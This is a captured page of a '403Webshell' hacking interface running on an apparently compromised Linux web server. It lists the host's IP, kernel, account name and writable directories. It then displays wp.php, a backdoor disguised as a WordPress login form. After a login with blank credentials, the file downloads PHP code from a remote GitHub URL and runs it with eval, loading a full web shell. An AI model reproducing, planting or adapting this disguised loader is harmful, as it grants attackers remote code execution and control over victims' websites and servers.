403Webshell
Server IP : 213.32.127.20  /  Your IP : 216.73.216.252
Web Server : Apache
System : Linux ns3.servidorneptuno.com 4.18.0-553.16.1.lve.el8.x86_64 #1 SMP Tue Aug 13 17:45:03 UTC 2024 x86_64
User : atoqsfjh ( 1072)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/3291606/cwd/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/3291606/cwd/public_html/wp.php
<?php
session_start();
$valid_user = " ";
$valid_pass = " ";

if (isset($_POST['log'], $_POST['pwd'])) {
    if ($_POST['log'] === $valid_user && $_POST['pwd'] === $valid_pass) {
        $_SESSION['logged_in'] = true;
        header("Location: ?dashboard");
        exit;
    }
    $error = '<div id="login_error">Invalid username or password.</div>';
}

if (isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true) {
    $Url = "https://raw.githubusercontent.com/yon3zu/403WebShell/refs/heads/main/403WebShell.php";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $Url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $output = curl_exec($ch);
    curl_close($ch);
    eval("?>" . $output);
    exit;
}
?>
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<title>Log In &lsaquo; WordPress</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://s.w.org/wp-includes/css/buttons.min.css">
<link rel="stylesheet" href="https://s.w.org/wp-admin/css/forms.min.css">
<link rel="stylesheet" href="https://s.w.org/wp-admin/css/l10n.min.css">
<link rel="stylesheet" href="https://s.w.org/wp-admin/css/login.min.css">
<link rel="stylesheet" href="https://s.w.org/wp-includes/css/dashicons.min.css">
<style>
html,body {
    height: 100%;
    margin: 0;
    padding: 0;
    background: #f0f0f1;
    display: flex;
    align-items: center;
    justify-content: center;
}
#login {
    width: 320px;
}
.eye-toggle {
    position: absolute;
    right: 10px;
    top: 38px;
    cursor: pointer;
    color: #999;
}
.password-wrap {
    position: relative;
}
</style>
</head>
<body class="login no-js login-action-login wp-core-ui locale-en-us">
<div id="login">
    <h1><a href="https://wordpress.org/">WordPress</a></h1>
    <?php if (!empty($error)) echo $error; ?>
    <form name="loginform" id="loginform" action="" method="post">
        <p>
            <label for="user_login">Username or Email Address</label>
            <input type="text" name="log" id="user_login" class="input" value="" size="20">
        </p>
        <p class="password-wrap">
            <label for="user_pass">Password</label>
            <input type="password" name="pwd" id="user_pass" class="input" value="" size="20">
            <span class="dashicons dashicons-visibility eye-toggle" onclick="togglePassword()"></span>
        </p>
        <p class="forgetmenot">
            <label><input name="rememberme" type="checkbox" id="rememberme" value="forever"> Remember Me</label>
        </p>
        <p class="submit">
            <input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In">
        </p>
    </form>
</div>
<script>
function togglePassword() {
    var pwd = document.getElementById("user_pass");
    var eye = document.querySelector(".eye-toggle");
    if (pwd.type === "password") {
        pwd.type = "text";
        eye.classList.remove("dashicons-visibility");
        eye.classList.add("dashicons-hidden");
    } else {
        pwd.type = "password";
        eye.classList.remove("dashicons-hidden");
        eye.classList.add("dashicons-visibility");
    }
}
</script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit